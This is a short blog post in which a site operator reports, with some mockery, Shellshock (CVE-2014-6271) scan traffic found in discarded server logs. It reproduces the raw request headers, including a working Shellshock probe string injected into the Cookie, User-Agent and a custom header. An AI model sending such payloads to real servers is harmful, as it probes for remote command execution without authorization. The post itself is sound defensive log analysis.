Attack of the Day

Thanks for the Heads Up

While cleaning out some junk logs and double checking things for a different project I’m currently working on, I stumbled across this in the long list of thrown away traffic:

GET /Ringing.at.your.dorbell! HTTP/1.0
 Cache-Control: no-cache
 Connection: Keep-Alive
 Pragma: no-cache
 Cookie: Greetz to M, st0n3d, Jorgee, CoLdZeRo, and Tomato lol!
 Referer: http://google.com/search?q=2+guys+1+horse
 User-Agent: CVE-2014-6271 ;)
 Test: Still a lot of these at 2015! haha! 'tangina!
 X-Forwarded-For: 174.36.209.208

By itself, kind of funny for a number of reasons. I thought it was very kind of them to announce their presence AND give me 3 entire seconds of warning before aggressively hitting 861 additional URI’s looking for a shellshock vulnerable page.

GET /siteUserMod.cgi HTTP/1.0
 Cache-Control: no-cache
 Connection: close
 Pragma: no-cache
 Cookie: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
 Referer: http://google.com/search?q=2+guys+1+horse
 User-Agent: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`
 Test: () { goo;}; echo Content-Type: text/plain ; echo ; echo shellshot_`expr 1344 - 7`

I haven’t followed the referer, but my instincts tell me it won’t be pretty.  Unless you’re into that sort of thing..  I’m not judging.  Hopefully st0n3d, Jorgee, CoLdZeRo and tomato will release some stats on their scripted adventure.  Mad props or something.  ‘tangina?

2 thoughts on “Thanks for the Heads Up

  1. Good point.. I was looking at it in terms of jkljkljkljlfji, but sdfdfsdf is an equally compelling idea.

Leave a Reply

Your email address will not be published. Required fields are marked *